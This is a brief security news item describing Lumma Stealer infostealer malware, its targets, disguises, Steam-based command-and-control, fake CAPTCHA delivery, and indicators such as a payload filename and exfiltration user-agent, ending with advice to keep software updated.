Infostealer malware, more specifically Lumma Stealer, detections have increased by almost 400% during the latter part of 2024.
Lumma Stealer is a malware strain targeting two-factor authentication (2FA) crypto wallets, browser extensions, and user credentials. It is often disguised as legitimate applications, such as “CCleaner 2024.” Upon extracting the malicious .rar archive, the payload includes a .NET executable named “XTbDOBjB3.exe.”
Recent activity indicates that Lumma Stealer has adopted the use of Steam for command-and-control (C2) operations by connecting to accounts with obfuscated usernames embedded in the code. Following execution, the malware is known to redirect victims to fraudulent CAPTCHA pages controlled by the threat actor. These fake verification steps initiate a PowerShell command that downloads a stager onto the victim’s device.
First discovered in 2022, Lumma Stealer has become a sought-after tool among threat actors. Written in C, it operates under a Malware-as-a-Service (MaaS) model, frequently advertised on Russian-language forums. Initially, data exfiltration was achieved via POST requests, with the user-agent string “TeslaBrowser/5.5” being a notable characteristic.
Sometimes it seems like the wild-west out there in the digital world. Remember to keep your operating systems and malware scanners updated and running!